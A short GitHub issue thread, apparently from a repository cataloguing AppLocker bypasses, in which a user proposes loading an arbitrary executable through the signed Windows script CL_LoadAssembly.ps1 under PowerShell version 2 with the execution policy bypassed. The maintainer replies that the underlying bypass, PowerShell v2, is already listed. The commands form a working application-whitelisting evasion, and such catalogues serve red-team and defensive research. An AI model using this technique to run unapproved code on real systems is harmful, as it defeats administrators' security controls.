CL_LoadAssembly.ps1 - Similar to already listed CL_Invocation.ps1 and Powershell version 2
Opened this issue · 1 comments
Deleted user commented
You might want to add this:
powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module .\CL_LoadAssembly.ps1
LoadAssemblyFromPath ........\temp\funrun.exe
[funrun.hashtag]::winning()
Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: Yes
Bypasses Constrained Language mode by invoking PowerShell version 2
Notes: Requires PowerShell version 2
api0cradle commented
I removed the CL_Invocation since it relies on PowerShell v2. So the bypass is actually PowerShell version 2 and it is listed in the generic bypasses. Thanks for pointing it out.